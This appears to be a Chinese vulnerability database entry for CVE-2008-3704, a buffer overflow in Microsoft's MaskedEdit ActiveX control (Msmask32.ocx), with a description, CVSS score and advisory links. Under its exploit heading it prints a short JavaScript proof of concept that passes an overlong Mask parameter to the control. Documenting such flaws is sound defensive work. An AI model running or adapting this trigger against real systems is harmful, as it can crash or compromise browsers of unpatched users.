Microsoft 多个产品中 Msmask32.ocx 栈溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115903 漏洞类型 缓冲区溢出
发布时间 2008-08-14 更新时间 2009-02-10
CVE编号 CVE-2008-3704 CNNVD-ID CNNVD-200808-241
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/6244
https://www.securityfocus.com/bid/30674
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200808-241
|漏洞详情
Msmask32.ocx6.0.81.69及6.0.84.18版本以前其他版本中的MaskedEditActiveX控件(MicrosoftVisualStudio6.0/VisualBasic6.0/VisualStudio.NET2002SP1&2003SP1/VisualFoxPro8.0SP1&9.0SP1及SP2中均有使用)存在堆缓冲区溢出漏洞。由于没有进行边界检查,远程攻击者可以借助一个超长的Mask参数来执行任意代码。
|漏洞EXP
var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC" 
width="10"><PARAM NAME="Mask" VALUE="';

var body1='"></OBJECT>';

var buf='';
for (i=1;i<=1945;i++){buf=buf+unescape("%0C");}


document.write(body+buf+body1);

# milw0rm.com [2008-08-14]
|受影响的产品
Microsoft Visual Studio .NET 2003 SP1 Microsoft Visual Studio .NET 2003 + Microsoft Visual Basic .NET Standard 2003 + Microsoft Visual C# .NET St
|参考资料

来源:US-CERT
名称:TA08-344A
链接:http://www.us-cert.gov/cas/techalerts/TA08-344A.html
来源:BID
名称:30674
链接:http://www.securityfocus.com/bid/30674
来源:MS
名称:MS08-070
链接:http://www.microsoft.com/technet/security/Bulletin/MS08-070.mspx
来源:VUPEN
名称:ADV-2008-3382
链接:http://www.frsirt.com/english/advisories/2008/3382
来源:XF
名称:visualstudio-maskededit-bo(44444)
链接:http://xforce.iss.net/xforce/xfdb/44444
来源:SECTRACK
名称:1020710
链接:http://www.securitytracker.com/id?1020710
来源:MILW0RM
名称:6317
链接:http://www.milw0rm.com/exploits/6317
来源:MILW0RM
名称:6244
链接:http://www.milw0rm.com/exploits/6244
来源:VUPEN
名称:ADV-2008-2380
链接:http://www.frsirt.com/english/advisories/2008/2380
来源:support.avaya.com
链接:http://support.avaya.com/elmodocs2/security/ASA-2008-473.htm
来源:SECUNIA
名称:31498
链接:http://secunia.com/advisories/31498
来源:OVAL
名称:oval:org.mitre.oval:def:5794
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:5794